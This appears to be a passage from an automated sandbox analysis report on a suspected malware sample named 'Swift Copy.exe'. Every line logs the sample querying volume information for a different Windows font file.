Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
